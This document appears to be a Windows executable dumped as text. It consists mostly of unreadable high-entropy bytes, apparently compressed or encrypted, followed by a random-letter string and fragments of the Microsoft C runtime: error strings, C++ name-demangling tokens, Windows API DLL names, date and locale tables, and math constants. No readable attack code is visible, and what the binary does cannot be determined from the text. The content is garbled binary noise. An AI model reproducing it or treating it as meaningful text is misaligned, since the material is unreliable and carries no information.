J\7����6����ht�%4�N%�0�W,�ġz��cas��(���p�W.�u(���v��D9'�o��4���ķC��k4\o%	D��ő��,3�� �K�E*�W�P��+�����-'�#�u��dܚ4��1]�Y�(��.d��d�)L��Ƌu���uLH<���,���HѰ_J�crX�����|D_k�b�I(m)�� ̤��mz~B�O���Aַ�>�_qК��8#���V��R��j%t�^�v-^�R}L�>���������C�.8�*:q?������-\P��c�l������$��\��u6��;@�8ǔ����j��{�.��h�{�9����y�6�C'�l���[}���G�Q���6���īڕXK/?�u?<�i�΀�iL����v���F�Q&��m�V�g�~Ll���h⎣s>�Yj2~��f�C���;������ڕg�h��E,�h3B���1����^,@�:sm����$_�<md�����(�a0+�$�^ ����>�!\,�iScՍ�Kv���Y[:�:����^�I�\��I���`Ե�jޢ�$H�l�u%�XM�[�(��� R	�
�����Z�"	�Ǚ���ǳ�d;�YFVs�1�C�����~�j��4�r-ً�D8vs������!�;4�Q6�ɪ�<��2r���u�@Hu�%C��<(���X�_��H�:��O�!l�;ۛz�s4��{G�6��ޑf�` �ݶZ*k��5��V��`�����l��i.��w�q�4]Eˊ#1����T"ހ��S��C^W
�g�a�E���G��i���/"��K�� W��bk=����BB�i�K�[�RbAĹ�����t��9J�@�Mʘ�O���I%�k�G��_��y���J́S�Ұ�cJ�<g�YA��[6�J�r=6����	�,�s�Y��Bu9�L���ݙ���K%]��8�U�t�%Ȣ����<��������3˽G� ��`mh8�q��}|�=�rf�0ђ�j�%�	Q��|'�v0�]:��IDȽ+ V_�~�3M�F�eX�c"�f-�o�i��w�
I"~ыq���.?���=��E�K�M!�0~�(�G�XV��R�TV���y������զq��E_z�P��z M#�$8�7�a���p�U��Й�~����ȫ��P��w�l��� ���A�[-������.���W��\��<��,�<^nR�T�y���M۔TD���(@��W��[�,>�v!���o���h���R�<��W�ԅ�0���8�[���4Z\˟��yQV�n4�LA؉�%}��ތw�����"�~)��TZ����J�����?ߵi5C�T)��������h��ɡ2��8�~G�?h z9�Gпd��d���7!�`��*M�j����=�W��S�ߌ��[]�|��/HJ��B�}�T�A� 
�m�
�y���׋!˨[�U�"��H��M��N�����Ԛ_M��`R��7�	�4v��ʭ�H���u�+�f��`$���6]���	��vy]�9YA�л�}�J�9?;CXJ�s�2QN���[�p��a	N�J�>:[t��i.c:�I�r��`���1u)*.:>@Z2��l��ӰY{�#���y0����|�i�_ܐ�5�ɣ���H������崴Z����&��kur}0G����YP;bt�	5I��0��E]2ʍ'�@�.��6{���.a���^����K�!��.-�˃��3u���b�&��x����u(�3��rN�?Fp����7+�-��c	Y�"�06��3���=۪��=/�<���;g�8j�{nwz����	�n�e��c8�܍d���v�洜h��_�[���]����]��&�� �P�'�'et��#76�9�{(�Z&Κ���������╕݃�k����>E���rRǴ�+��!w���j;�Q w-瓋
�4Uz�\�}�c"�>bKD�G\7��>����|߈;e�:Z�bf*Cv� ̊�kE��������O�w$��;`�F�V�Q����r�$����ƨ�1C6����d�ʈ9��-$��N��R B�Z���6�>m[2�>iv�_^��g��0\/�Ɗ�tq�I=��:��/P�v�I���Q�	���E�R�yoR6�Κ�X$�L����TJc8I����HE��s�q��x�N�}#c^5[��{GF�1B��y�v^X��UI�1�.��a�қ�GR/"ޢj_ʟVb�Ą�cb>�����q�F���#7`=�R8�Jj �I��G@.3��!�G�B\���u���w�M��YQd����w��TL�"͂�N��a�\�A�~���D�����x��t�2?&���Y��tm��`ILq9��,���.^��Z��7ۼ��5QfVې���L屽&�2�Kh��/�o����u�(��Mf�n�ۂ������8�MJ[9���̛Ww�%w�Ӥ�X~%��Vk���i�j;�U1�n3��.�[��&����H���s;7#�`nGjz��A��(塨׊	j���V�_c�(}҃�=�׆WVaI�dz#��}Q(ͮYD��F�s8��jT������:��[ѯ�O�"�@���F��1T�`4���Q�p~��$[{��9�n�i�3 �JϞo"[^U9Q�pkS��P����)t�'ށ�n������>.�3��|���G��q�7}i��X˫�ü�A;P�:��/0�w>��̇��mڦp�:�)�\��w�!���L>TlڧI	j��Pg��\\z�L��4Y�7�( �P񦣅?�L�V/�CL#�N"��"����O� �D��)+��Oc��n؀R���
!��WK�9>��]�4gh⊛�X�*T!FltGf��*��V7����KXL�B֌E��+iKZ,U,�WǓ�#e���QyMi���-���=�'���ya�>~�p�8J���φ�?Aњ�������<'zy�e�s��I������<@�:���v����tƊ�t�13�-t
�=4�n�Ћ��2T�������p��:b�Fͯh��
�Y�������O���1W������������⼕��o�i��|�~;e��!�~ϒ�L�>�7�R����=�9+r�����*��j�)���ǀs�EG�������������6+�b�.db���ʾ��J��a��IDhl�2&cQI����v�}�Y/��p�����y.C(�d[u����N���ΌT�ׅ� zޠ�?b�r�����'�Xr���T<S��1H�j�A���J��T*~����ٺ��N��)��oL��� Z�f��T+�í \V�17�h*��j {�I��m+#����&T��@p� �Y.���q��:�&_���ֳލ�A�s}���_
R�S"�w���}|t֏W�(��@��1p�[��qδ\Fۡ?u���퉽���U�`�-s�d�%!��z#4�F�Z��s�Y"��δ�,�W�����j:�3�ǗA0��������>��,�� ���v,��:v�B�bE�9�]Э�ߨ�����1��Lٲݚ�� I34Y��]3�I˽�^I)��r�fĉw��Į�0�9��"�wo���)]w�a�V�G�N��&�4
.|���`2�F��x�햝�p�-_0
� V��8<���� �?�=_*EYZ�����^���9� -�y�d���[x�Xm�����B/b�b�H���O2~\���r`�e�I�ƿdF��G�t�:�b
�,	�)��g��*�7ڂ��N��|��\�Y9ȣ��t�z�ɠ\�n\�=���I�N³�������z.ğ_6�{;���`8�H~F��q!e
'�h",Y�+�|؇�NI��܋��K�5�X:�&L���DRVE+��s�p�S��H��O�}�YP��WחK+|,S���2�(ev�UǬu\��4U���h��$	��;�i���>f�DV~���!����M��E__GL��'���~L�����Ñ��/ab�V���K��M"����D�w�?	\��_6dX!�)Ei��+�1Ә�"?���(y1���.��]�� ESx	�Tp��	kɈ':�^��%ء5)�&j惘!q�S�5pў���|e�K���e�K��)G6$VG�J����������RL��P�ȭW�ഘx2Ƽj�s%��m��AK�P;�lW��u � ����Ԉ���)��ڧ@p�$�0q�Ȃ*���'}���[yz��!�c��);�\1� [G}�q�h����:\D�G+�d-�k,�8I$u<�2����    izГ^�HK!��2�!�d�I�i�D�(����(����JD�ʁ!�)q��AIy���8h���?Ŗ&ȉE�챇sn��f ]=��c1�D+|t�����xm�=^����Q�+�X�)�u�`y""�v�������F��s�<~N�?��^Q26�#����WOO4!�m�WV*�Ndc�	��e/&�S���
u���Qx�#���߶ &	���(�*��qգF1�˷p�s�8���{�5�|O�ҏ[�� L��� ՙ�߂c/��rb	�10� ב&�EJI�RSaZ=�A�{�T4|5T�{��\���~��Ka���=ެ��!aå36��x���m{���^��<�{T�5Ug�� J&��M�c�s�-؝H�j���x�X����/j���7�0/ξ�IɓqQҚ��ee��ɾz�]�k?<$bݭѬ���$g��df�DP��ͅ�\�8���\
��xO�p������N\57Di�h��i�b���������[����m&NC]S���ʈ���/���7�b�E�Kg[��)澂���Y~����������F�˾(���A���mG�,���sɪ�.N�Rpe9��54YO-إ��2:cpK�wb�?�4=���ꥰ\�N�"���'z����*2������H��Rtc������O��{�n3ɁS@�0g��yp��oי�;��HՌ��E���E%��w�S��f'���M�sEdX��8���YpUL�-$��������W(\��jh΄[��E8�z_Ӊ�2�B�"�7nP?��C��9����iv?�w��l0�Q�&W�d=�����5����b�
X��09���/���L��/�y��E�7��V��wT��8�KÇ$��l�%��1�Y��Աk/#Xi�d$D���(�\�%b��#���<.��jv�ZwV�I[,�����\Żp�d���К��{n]�_tv5�q0�Ch��� �7�V�I��B�3��@-��)EFĞ�y�KSa��3�gWj��gw��v�������[�Y��y�3SAS� Oс�V=�3���/�ʇR�<����l���Q}[�D�䔾]���*Q�0�n�
����7�Cv�m���Xn�=u�ٯغ�K�G��դ�	���#��\cҶ��2ٸ��;��
u >���;�O
�2�FW�mtTW!)�oψo��A�"�R�!l�K�!�x�u� �f7>� Q��]:����)�A�F��bd�p�a�nR���@��q-O�WVCH��z鯸��<��5��y�H虻�;]�}��d�<��f�|�B��Ğ�x I�}C�iߺe�K7���!++���lW��6X�+S���JiZ G[wV�Ub�	Ĺ0�b\u�CY����������:� ��1T4�g$30$���ߘ'u����x=�$H!�_۬Flli�G�)��HB`�B#�q��%�"x���V��R�&��Kt���"aj��� ~�F�ᤕ�r�4�[P�Qy��V>�����p#,��MT�=,��\�̙>r9����#�yk��@<����&A��z�nВ�Pv���m�~C��y͙�������Cށ�,���n4�?������Y-4~�(�Q�L"�,>��i~�}�雾v�=oa�-e�Ü�o@�=$��^@���?���$oe�D9�|���?�1}����%-����\f	��w�k:l����E��Ƽ��R.�}���n����}gG�k�ԥ�4��a�ł��zM�w-.%�8�gawI�)��}����1Y��Y,
3�N�|���QwC�A��B����I6���i�)�i��S�9���p�E������X5�&��J��0�rBw���L.�:PKP��?��}=�w
o��)F����S��LF���@p�l�/���=��7X�tzB3&y��4�.����rT�q%�9���RK�Ũ�%jW��%f��6"�n�~����Xc��z"��2�nR�}�ȢJDET[�2��8�j 
q�q��c����<�,6������ʔ������_|?�;%�-���Ӄ�c�����ԍ}P�pQY�X~�M��)�7��G�<Hmr�r� B���@f���g!w-1� F���� (�I-����"�=�/�lZb~|@����t_Kr���F�W�!tzl���|t�T�]�a}�ek��g%+�pSB_ӝ�]ep$E� �ٽ{LQ�kϙh�jG�}��Ů)�YW����2�>�5ޠ	��QhKu����.�_<�iJ�ġ������������ܢ���z�g2�8��űu�L��
��E�Kb|fJۢ\VВH�;`'���#���#�
��Wb-��-¬�ڤ����mT��^�db��ϧ�dK���-���v���[s��ُ���R���'�L�|�j$a�2�ipΟ�pJ��[G�٫�FL.�3��l��C{�Dj��`��R��hO�:-H�0�z��!)��-ǤM׻��2�t�)�(Vn˗k��Y�µ�%M�ֳ�Z,�[�jTP�@f���9�U���X�mL�wjd�9���� �B���٢���W�R�O�/�J����gt[�V�tdםV�	5dw<ڇ2���Y$`��=�i����=d-W���@g��p@t��9F��[�3�x2v)������W[����g��O��K#X<��"ܠ��ǌAc��D�6D������6�T�S�5@k,M���&P���c�o�Dh�9��S�u?	yH�#��[t%�^C��-�"�#�#ݥBSw)��'���~�U���L����=XS�=��q|�~> l��=*��o��H�yُxҹIF��D��n���Eg |�[�r���2�?�FJs��Z�:�L�ԍ!�``E����=��<;׫)���	Vi�<�CIJΉ����5tX�oT�`���W
�)%��ŊX����O��igi9�����=��ߒ�� -���t�$&�1.�y��Z��Ǜ|ө������6�ìZ��1׀�FG�yC��%�#�%�QO��V��0��#%s� �����BF�M�r�_���,S���������a?��O�U��O�&:��=g6Kz>��({Dk&�]cO��MRR�窯uB�͈��Fw{<��x�Ԅvr\��eE�[ݿ ���37��<9nO<��`{�2`���ޞߪi��%�=������B��وZ+�/�[T~~�ِ�rZ��X��e��dGM {���e���%�A�$�V�o-�6a!��N�7r�/��xvt㟳|~iQX�YɯF��9Nb��(�}�G�>���`�P��1v�k�}�m���� m��
���Ǿ�)��r�<���=�)��B~h�RZN���'lת�R�«ð��+7�޻x���1^��Y�{Ր½=�s���O)m~$�z�1�^�@��%3�����+��(^?��,?���#X�[�ͣ�uC��Ф�ʧ��,H����11���ė!g���<�����=���`_6��E�f��>)S�80�_����'_Ti�Ne J��t�I�uZ�sH���/���䬯�q �>�\18,
\U1�yb����Ĕ�q�_Z]]�屴tԣ�����<ͮ+�>"���9%E�|�WJ"QaB�����,��t�ED����Ot�o������(�<�p��9�g�Y�H2sm��o�A�e�a�M?5*�R�
R�&����O�ןӌ�'�ym���bw�k�b+Rs햀�Q��^��T�[��L�� ����{Ut�	R�Gu	hHCo{���3�BR��*���Ҥ���k7�𑪣�$%3W�r`=g��%�.��y�e�5�\L#Nx߈�)���� ���}�oE��C���T,�Vy�h����M����g9�;Ry6)?���S���j�̳���4��Z(!K���q:��/8�@�	�1ߦ`�{�.�kا�r�̰�Dk�1lo��K���>=��y�U2�hwE�-į;$�{2&�GN@��nh&IY�P*b]#�4��{F���0��AG��1zL(���J�����̺�X��&}hV�-�h7�kjV�_Җ�TC��r���?�Ѣ;|��!�ZEL��ّ�6~`��9�=�������oO8U�|���Lk9�xi]ͅ���4y�Zj���g�'�Ê�vK�&`���b�f�&ȕ㈝�˯��T�=�檪 �7������� a�4�r�ww��V┆^\A��_��ĉ,8C��% ���(�S��%��؆W���_$K�~x,b�;>$m�e��!����Z�P�J2��ގe�����i������� ������"p���z\F�����C��$y�$/"�=�B�c��mL�a��=�8/l>���yd�c�ϑ�n�93����^L�Wֺ�8��S��i�<�>H���@����O���t��p�A�pT��dK�H��b����]�rF��ޱ��E�7 f	�0,�zh��B3)s%��&���u����Φ��B�D3�bu��'�wGd^�|�,�s�?�&T9��UL�qS!�<JKe�V�AxxȪ�܈ք���=j;M"�$�C���Q�\R��b*���p)���4:��*񽂉AC�q�t]o���O�/1�q�۰̈��^)��{����r�X�f������	�ܺ�%��h?%��g`��2�E����6��!�.�%R3g�R-��+���j]��ÕGP7 ��!x�3Y�q"�:�ׅ��n�������&-����;9���pIp�']ہp?"���^Hň�kS����e���ɺ���]H���BUx8���<&�f_��PRp4|����eˢ�=8r�p��֥�HPp���~!�J��eg���>���/kڮ:n8Ȋ������̛󳤴~Î����
�@�,5�:�,�e��Q 6-�Q���Z�֞6|9�L���������/��.?q����5U��	����͉����[����t���6�.0%{g���Q������U!c$*���Ϛ�H�=�eM&/�ᾮ�ʮ�K+q�HBvJԧix7���q��E��,�E�nN��a�:���Y�!�|��(�yr�m^����I1���	|��~�̜�������8����pZ�/5�
�-oL���d}���J��du����<U 	�������n:�^rپ�k`��3�����}U�$jHg���.�Ͻ̀Y'�^��=X"c�-�2��u�I�Ң����4w�TALo����UY
L�B[v'J��x��	qF;��f���8��K�����.��)/1�˗<�|yI4��>���e�YN��"5ֳ�e��E��&��v�]̋�ٵ�e�A���?��b��Q�r��z��"�V�
��*Â����	������s�l���]�al�`Z�k�TS$��T�׿��n@g�C�ra@!�5A!�RO�d���ɗ�hlz��D�������Qģ��l��� D���"sqX�r�n�H�!�QOd��4������ʛ1�4R�,�������{o�
t�Z�H��{m��+z�ǲ��6�:N�i��@P��v��{Q�G�u��)�96T��������e(}�Pgլ�i���-����y%
ҺY���v%���#ZA����L~B3�Ȩ
�E��hp�&�'�Y�T7z�J<{���8��L�?k��+W@-��7�;-�����Y�6\J�9� �|ﶃ �:e	M�s�I�u�����o�bB-3�8D�x��e�N'tQ�h[��F���x��6Y�yJ�=����@X+��rz6䬾����L�<o��0g����u��j���4>�%���{Э^�a��26����b��[��eaz�䡨�LL^�`�~h������IՀ��6�FU�o>���8���"~�R���n6Cí��u�>�V�r���͌�jVi���mä�uz��H�)C���z����Lt��� I�k
W�\0�����2�eK"ފU��I�f��27A�#��]���f���1V�Ƴ�ǭ}�u���=�m��v�}%��'�H�ML9w�O����b�nM�������iW��[b ���B�ݪ����R���e�'��s!��Nb�&|�����1���&^]���O���ms����GR~�$�6�Wai>x�1��N�N�ѡy��z��]=�
$:�8�X~db~Fa�sy|˗�LeYï4>s�Q���8���J�~��2�7�`t�5NA9�zN��J�m逩��ɩ<3Gd�
,�����4`��24��#��<Sw��PF8�DI�q��K��m69��s�%�ӴW���<�M8Ƚ)���Ro�,���$ziJd�`�8qL6 ����
sZ�1wE1g�=����P��|�)��`�����'��~���<�g>AO��{�/ȠiN=fi���v1�8��T�������V-�ԙ�];�'�mt�cP��3!��z�=Ւv��.�阚�.��]����Gљ�p�@Ea8���D�X�dl+"�Y�x�R든-dڞ3B�
j~G6y��Sdׄ=�|@e����a��S��(A�����\g��{:
�-/5b�_�+�2.���u@"/�mt@칦UӮ�_��2�]��]�3}�Ԧe�L@���lc��eN�af�o#��*xކ}K�n�-���a$�ٶ�T�ϩ��v�V�@B@���j̶�NI[�T�{�m~���S�-�f������,�T˩+6䗧��mV �D^�B�,��=n$B����ͅKi�H�0�_��L��{	��Ѱz�W$(&��;�z�'������AǸ���>���qSHo����g�~�9���興s{�,)C�����c�J�V��]�ߚ����<w���1�ʋ��v&���z�wvD�@�L��lV:�?�m��!�?�m�q�]��]��u��k'�U����6��WDp�4;���y���ɝ�>�*��C�����6����]3���~`�Z�ΐTK��!U%'yV~m�n��3�%e�]^�s��5Nrw0ն��Oy�di��S!�Iǰ]܏�M~N�US�ia]'�bԂ%���/'<��Gi�lp%�e��j�z":��Gt~X���M�Z8cQq{.-#��9Ѻ�n$B *�+G7zu�U|8U�����ɡ Á���/^w�l���Ԑ���`i�"S���+�SjѠ�����K�[�|&y�Z�ILL^���塲��`]u���H�1ף�(�mC.��"CXy[��� �5�É,����>�[��_X��#{���jb��ub����:'1)�U�+���D��Lr��|����,��*��/N���%T�2�+�i�����/[f��$}T�H�vcD-=�K    meIQYxmzonDwinhPuUlfhRMLrpbVEbtUfDeEnuYaVLoeACXuOcHXFkPKQgEXyJgJtSrTUEMEjS  bad allocation  dk�@( �k�@(  l�@( Pl|          �O   _����    0|�|./�l�@( bad exception   X   d   l   x	   �
   �
   �   �	   �   �	   �	   �   �
   �   �	                          $   (   ,   0   <   @   D   H   L   P   T   X   \   `   d   h   l   p   t   x   |   �   �   �   �   �   �   �   �   �   �   �   �   �   �   �	   �	   �   �   �   �         <   \   |   �   �#   �   �        @&   h   �   �   �   �   �#   �   �	   �   �      4%   \$   �%   �+   �   �    "   <(   h*   �   �   �   �       �   �      $   D       @   T   �   �   `   �   `   __based(    __cdecl __pascal    __stdcall   __thiscall  __fastcall  __vectorcall    __clrcall   __eabi  __swift_1   __swift_2   __ptr64 __restrict  __unaligned restrict(    new     delete =   >>  <<  !   ==  !=  []  operator    ->  *   ++  --  -   +   &   ->* /   %   <   <=  >   >=  ,   ()  ~   ^   |   &&  ||  *=  +=  -=  /=  %=  >>= <<= &=  |=  ^=  `vftable'   `vbtable'   `vcall' `typeof'    `local static guard'    `string'    `vbase destructor'  `vector deleting destructor'    `default constructor closure'   `scalar deleting destructor'    `vector constructor iterator'   `vector destructor iterator'    `vector vbase constructor iterator' `virtual displacement map'  `eh vector constructor iterator'    `eh vector destructor iterator' `eh vector vbase constructor iterator'  `copy constructor closure'  `udt returning' `EH `RTTI   `local vftable' `local vftable constructor closure'  new[]   delete[]   `omni callsig'  `placement delete closure'  `placement delete[] closure'    `managed vector constructor iterator'   `managed vector destructor iterator'    `eh vector copy constructor iterator'   `eh vector vbase copy constructor iterator' `dynamic initializer for '  `dynamic atexit destructor for '    `vector copy constructor iterator'  `vector vbase copy constructor iterator'    `managed vector copy constructor iterator'  `local static thread guard' operator ""     operator co_await   operator<=>  Type Descriptor'    Base Class Descriptor at (  Base Class Array'   Class Hierarchy Descriptor'     Complete Object Locator'   `anonymous namespace'   ���a p i - m s - w i n - c o r e - f i b e r s - l 1 - 1 - 1   a p i - m s - w i n - c o r e - s y n c h - l 1 - 2 - 0     k e r n e l 3 2     a p i - m s -          FlsAlloc           FlsFree        FlsGetValue        FlsSetValue       InitializeCriticalSectionEx  �T     c-^�k      @��tFМ,�    a�����\��)c     d��4�҇f��;lD      ِe�,Bb�E"�&'O�   @���V$���gm�s�m��r    ��d'�c���%{��p��k>�_     �n���j�f29.EZ%��qVJ���  �.�C��|!�@Ί��Ą'�|Ô%�I   @��T�̿aYܫ�\�D�g��R���)��`�*     !�����V��G6�K]�_܀
���@َ�Ѐk#c  d8L2��W��BJ�a"��=<�r��tY���l�*��   �[aOni*{�P+4�/�'Pc�qɦ�J�(.onIn   @2&@�Pr��є)��[f�.;��}�e�S�w�� �S��ƫ%�KM� �-����"RP(���WB�}]9֙Y�8� ����w�za��ja  ��g�V �:�6	�ip��ev ��&���gn	�+�2qQH�΢�ER   �x���t� ]�u�۩����reLK(w��mCQ�ɕ'U���'樜��=    @J�����#�m
Xo�C�]-�H�Y��(���?�.�qּ�Di}n��Vyu��  Ჹ<u���?�k:��އ�FEMh�����$��h0'D���A����X�Qh٢%v}�qN  d��Z��W��� f�) ����}m?�M���p��=A�N��q��א:@O�?��owM&�
   1U�	�X��&aV��j��uv�D,�G�A��>������U���D�~ $s%rс���@b;zO]��3A�Omm!�3V�V�%���(���w;I�-G 8���������N��hU�]i��<$qE}  A'JnW�b쪉"���������f3���7>,���ެd��Nj�5jVg��@�;*xh�2k�ů��id&   ��_����U� J��W��
��{�,Ji��)�Ǫ���v�6�Uړ��ǚ��K%v�	���t:�H孎cY�˗�i�&>r䴆��["93�uzK��G-w�n��@����_�l�%B��ɝ�s�|��-C�iu+-,�W��� @z��b��j������U�U�Y�Ծ�X1��EL9�M� ���Ly���;�-���"m^��8{�y�rv�x���yN��      ���\lo}���;��obwQ4���Y+�X�<�X�F"|W�Yu�&Sgwc���_
��i9�35����1�C!�CZؖ���?h   d�}�/�K�����N��s�	��Og��ֵ���8s��I�̗+_�?8��� 7x��B���">W߯�_��w���[R/=O�B
    ��R	E]�B��.4��o��?nz(��w�K���g����g;ɭ�V�l��� �H[=��J�6�RM��q�!�	�EJjت�|L����u �<�     @����rd�6���x)�Q�9��%0+L�;<�(���wXC����=s��F|�bt�!ۮ��.�P���9�B4��������Ҁy�7   ��P���,�=87M�s�gm���Q��Ģ�R�:#שs�D����p�:�R�R��N�/�M��׫
O�b�{��!@f� ���u���)/��    �wd���q=v��/}fL�3.��i�Ls�&`@<
�q�!-�7��ڊ�1�BAL��l�ȸ�|�R�a�b��ڇ��3�ah𔽚�j���-    �6zƞ)�
?I�Ϧ�w�#���[��/r5D���¨N2Lɭ3�����v2!L.2�>���p6�\���B��F��8�҇i���>����o��     @��@��w�,=��q�/��	cQr���FZ*���*��F΍$'��#���+����G�K	���ŎQ�1�VÎ�X/4B�����ycg�6�fvP�b   a�g
����;s�?.��❲a��c*�&���pa�%�¹u!,`j��;҉s}�`����+�i7��$��f�nIoۍ�u�t^6�n�1��6�B(Ȏy�$�    dA���ՙ,C�瀢.=�k=yI�C��yJ��"�p�����פ��l d��N�n���E�t�T��W�t��øBnc�W�[�5��laQ�ۺ���N�P���qc+�/ޝ"     ��^<V7w�8��=O�ҁ,���t��×�j8�_������լ�Z>�̯�p?��m-�}o�i^�,�dH9���4X<���H'�W&|.ڋu���;��-�H�m~�$�P         	     % - 5 	> 
H 
R ] i u � � � � � � � � -C	Y	p	�
�
�
�
�	%
   d   �  '  �� @B ���  �� ʚ;    m i n k e r n e l \ c r t s \ u c r t \ i n c \ c o r e c r t _ i n t e r n a l _ s t r t o x . h       _ _ c r t _ s t r t o x : : f l o a t i n g _ p o i n t _ v a l u e : : a s _ d o u b l e   _ i s _ d o u b l e         _ _ c r t _ s t r t o x : : f l o a t i n g _ p o i n t _ v a l u e : : a s _ f l o a t     ! _ i s _ d o u b l e   INF inf INITY   inity   NAN nan SNAN)   snan)   IND)ind)            UUUUUUſ      ��?UUUUUU�?��*�l�l�V�4�V���>���>���m0_$@      8C  `a��=  `a��=  @T�!�?sp.�c;      `C      �<�������?       �      �?      ��������          �         �       �  �       �  �       �  �       �  �       �  �       �  �       �  �       �  �       � �       � �             	   m s c o r e e . d l l   CorExitProcess      ��    ۗ    =�Q������������    	����	�i�t�����        ��    Y�    ���ӗ����L#P#T#X#\#`#d#h#p#x#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�# $$$$$$,$8$D$H$L$X$l$       x$�$�$�$�$�$�$�$�$�$�$�$%%,%4%<%D%L%T%\%d%l%t%|%�%�%�%�%�%L%�%�%�%�%&&(&<&D&L&`&�&�&Sun Mon Tue Wed Thu Fri Sat Sunday  Monday  Tuesday Wednesday   Thursday    Friday  Saturday    Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec January February    March   April   June    July    August  September   October November    December    AM  PM  MM/dd/yy    dddd, MMMM dd, yyyy HH:mm:ss    S u n   M o n   T u e   W e d   T h u   F r i   S a t   S u n d a y     M o n d a y     T u e s d a y   W e d n e s d a y   T h u r s d a y     F r i d a y     S a t u r d a y     J a n   F e b   M a r   A p r   M a y   J u n   J u l   A u g   S e p   O c t   N o v   D e c   J a n u a r y   F e b r u a r y     M a r c h   A p r i l   J u n e     J u l y     A u g u s t     S e p t e m b e r   O c t o b e r   N o v e m b e r     D e c e m b e r     A M     P M     M M / d d / y y     d d d d ,   M M M M   d d ,   y y y y   H H : m m : s s     e n - U S                                    	               	      
                                                !      5      A      C      P      R      S      W      Y      l      m       p      r   	   �   
   �   
   �   	   �      �      �   )   �      �      �      �      �      �      �      Y  *                                                                                                                                                                                                                                                                                          ( ( ( ( (                                     H                � � � � � � � � � �        � � � � � �                           � � � � � �                                                                                                                                                                                                                                                                                           �������������������������������������������������������������������������������������������������������������������������������� 	
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� 	
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~��������������������������������������������������������������������������������������������������������������������������������`.�.�. /�/�/�0H0�0�01h1�1 2�2 2h2x2a p i - m s - w i n - c o r e - d a t e t i m e - l 1 - 1 - 1   a p i - m s - w i n - c o r e - f i l e - l 1 - 2 - 2   a p i - m s - w i n - c o r e - l o c a l i z a t i o n - l 1 - 2 - 1   a p i - m s - w i n - c o r e - l o c a l i z a t i o n - o b s o l e t e - l 1 - 2 - 0         a p i - m s - w i n - c o r e - p r o c e s s t h r e a d s - l 1 - 1 - 2   a p i - m s - w i n - c o r e - s t r i n g - l 1 - 1 - 0   a p i - m s - w i n - c o r e - s y s i n f o - l 1 - 2 - 1     a p i - m s - w i n - c o r e - w i n r t - l 1 - 1 - 0     a p i - m s - w i n - c o r e - x s t a t e - l 2 - 1 - 0   a p i - m s - w i n - r t c o r e - n t u s e r - w i n d o w - l 1 - 1 - 0     a p i - m s - w i n - s e c u r i t y - s y s t e m f u n c t i o n s - l 1 - 1 - 0     e x t - m s - w i n - n t u s e r - d i a l o g b o x - l 1 - 1 - 0     e x t - m s - w i n - n t u s e r - w i n d o w s t a t i o n - l 1 - 1 - 0     a d v a p i 3 2     n t d l l   a p i - m s - w i n - a p p m o d e l - r u n t i m e - l 1 - 1 - 2     u s e r 3 2     a p i - m s - w i n - c o r e - f i b e r s - l 1 - 1 - 0   e x t - m s -      AreFileApisANSI             LCMapStringEx         LocaleNameToLCID       AppPolicyGetProcessTerminationMethod                            cos                                           �?1mm.�s�,�)���?   �'>�      �?�i����i<���?   �mb�      �?Z"�������.��?   ���u�      �?ϕk��|��c����}�?   ��,g�      �?y�sh:��;�8]+�?    �^<      �?ty�[g�ſ�h�9;��?    �%�<      �?���S�Ϳ�	%�L�?    jh<      �?2���y��?�;f���?    4݋�      �?Xw$��3�?Ak���?    �ł�      �?��暳s�?��)f��?   �0�9<      �?N��,J������8�?   ���v�      �?uZEeu��F�2�k��?    �Wt<      �?-��v1��?�-�VA��?   �`�<      �?�gY���\�ϗb�?    bu<      �?P/Ye���&%ѣ���?   @�}��      �?              �?                P/Ye��?&%ѣ���?   @�}��      ���gY�?�\�ϗb�?    bu<      п-��v1����-�VA��?   �`�<      пuZEeu�?F�2�k��?    �Wt<      �N��,J�?����8�?   ���v�      ࿇�暳s����)f��?   �0�9<      �Xw$��3��Ak���?    �ł�      �2���y�ʿ�;f���?    4݋�      ����S��?�	%�L�?    jh<      �ty�[g��?�h�9;��?    �%�<      �y�sh:�?;�8]+�?    �^<      �ϕk��|�?c����}�?   ��,g�      �Z"����?��.��?   ���u�      ��i��?�i<���?   �mb�      �1mm.�s?,�)���?   �'>�      �                              �1mm.�s?,�)����   �'><      ��i��?�i<��ȿ   �mb<      �Z"����?��.�ҿ   ���u<      �ϕk��|�?c����}ؿ   ��,g<      �y�sh:�?;�8]+޿    �^�      �ty�[g��?�h�9;��    �%��      ����S��?�	%�L�    jh�      �2���y�ʿ�;f���    4݋<      �Xw$��3��Ak���    �ł<      ࿇�暳s����)f��   �0�9�      �N��,J�?����8�   ���v<      �uZEeu�?F�2�k��    �Wt�      �-��v1����-�VA��   �`��      п�gY�?�\�ϗb�    bu�      пP/Ye��?&%ѣ���   @�}�<      ��              �                P/Ye���&%ѣ���   @�}�<      �?�gY���\�ϗb�    bu�      �?-��v1��?�-�VA��   �`��      �?uZEeu��F�2�k��    �Wt�      �?N��,J������8�   ���v<      �?��暳s�?��)f��   �0�9�      �?Xw$��3�?Ak���    �ł<      �?2���y��?�;f���    4݋<      �?���S�Ϳ�	%�L�    jh�      �?ty�[g�ſ�h�9;��    �%��      �?y�sh:��;�8]+޿    �^�      �?ϕk��|��c����}ؿ   ��,g<      �?Z"�������.�ҿ   ���u<      �?�i����i<��ȿ   �mb<      �?1mm.�s�,�)����   �'><      �?log log10   exp pow asin    acos    sqrt              �?�;�;�;�;j a - J P   z h - C N   k o - K R   z h - T W   u k        C   C    C   (C   8C   @C   HC   PC	   XC
   `C   hC   pC   xC   �C   �C   �C   �C   �C   �C   �C   �C   �C   �C   �C   �C   �C   �C   �C   �C    D    D!   D"   �;#   D$    D%   (D&   0D'   8D)   @D*   HD+   PD,   XD-   `D/   hD6   pD7   xD8   �D9   �D>   �D?   �D@   �DA   �DC   �DD   �DF   �DG   �DI   �DJ   �DK   �DN   �DO   �DP   �DV    EW   EZ   Ee   E    E  $E  0E  <E  �;  HE  TE  `E  lE	  �&  xE  �E  �E  �E  �E  �E  �;  �;  �E  �E  �E  �E  �E  �E  F  F   F  ,F  8F  DF   PF!  \F"  hF#  tF$  �F%  �F&  �F'  �F)  �F*  �F+  �F,  �F-  �F/  �F2  G4  G5  